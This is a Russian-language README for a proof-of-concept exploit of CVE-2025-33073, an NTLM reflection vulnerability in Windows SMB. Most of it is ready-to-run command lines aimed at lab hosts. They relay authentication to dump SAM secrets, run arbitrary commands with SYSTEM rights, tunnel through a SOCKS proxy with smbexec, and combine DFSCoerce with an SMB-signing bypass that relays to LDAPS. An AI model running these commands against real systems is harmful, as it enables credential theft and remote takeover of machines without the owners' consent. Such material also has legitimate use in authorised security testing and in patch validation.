
PoC-эксплойт для уязвимости SMB, связанной с рефлексией NTLM.
PoC-эксплойт для NTLM reflection уязвимости SMB.
Все заслуги принадлежат официальному исследованию:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
ОС: Kali Linux (большинство пакетов уже предустановлено).
Инструмент автоматически использует виртуальное окружение. Для настройки выполните:
./setup.sh
Это создаст виртуальное окружение и установит все необходимые зависимости, включая ldap3-bleeding-edge==2.10.1.1337.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
Произвольная команда
Вместо запуска secretsdump может быть выполнена произвольная команда.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
Для более скрытного выполнения команд после установления валидного соединения с правами SYSTEM. В этом случае --target и --target-ip должны совпадать.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
Также через proxychains может быть выполнена произвольная команда вместо дампа SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Было проведено исследование, чтобы проверить, действительно ли reflection не работает при включённой SMB Signing. В результате были найдены баги: если удалить SIGN/SEAL из пакета, становится возможным relay с SMB на LDAPS, что обычно невозможно из-за MIC.
Благодарности:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
Если вы находитесь в том же широковещательном домене, что и устройство, и оно уязвимо к LLMNR poisoning, можно эксплуатировать устройство без необходимости регистрировать DNS-запись.

Локальная NTLM-аутентификация выполняется

Локальная NTLM-аутентификация не выполняется, что приводит к неудаче (FAILED)

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073